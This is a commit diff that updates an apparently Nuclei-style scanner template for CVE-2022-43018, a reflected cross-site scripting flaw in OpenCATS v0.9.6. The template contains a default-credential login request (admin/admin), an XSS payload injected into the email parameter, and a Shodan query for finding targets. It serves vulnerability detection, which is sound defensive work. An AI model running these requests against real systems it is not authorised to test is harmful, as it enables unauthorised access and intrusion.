Update CVE-2022-43018.yaml
parent
b65e71cb8a
commit
2a91306bb4
|
@ -1,18 +1,18 @@
|
|||
id: CVE-2022-43018
|
||||
|
||||
info:
|
||||
name: OpenCATS - Cross Site Scripting
|
||||
name: OpenCATS v0.9.6 - Cross Site Scripting
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the email parameter in the Check Email function.
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43018
|
||||
- https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_checkEmail.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-43018
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"OpenCATS"
|
||||
tags: cve,cve2022,xss,opencats
|
||||
tags: cve,cve2022,xss,opencats,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -21,14 +21,19 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username=admin&password=admin
|
||||
username={{username}}&password={{password}}
|
||||
|
||||
- |
|
||||
GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=<script>alert(document.domain)</script> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
password:
|
||||
- admin
|
||||
attack: pitchfork
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
Loading…
Reference in New Issue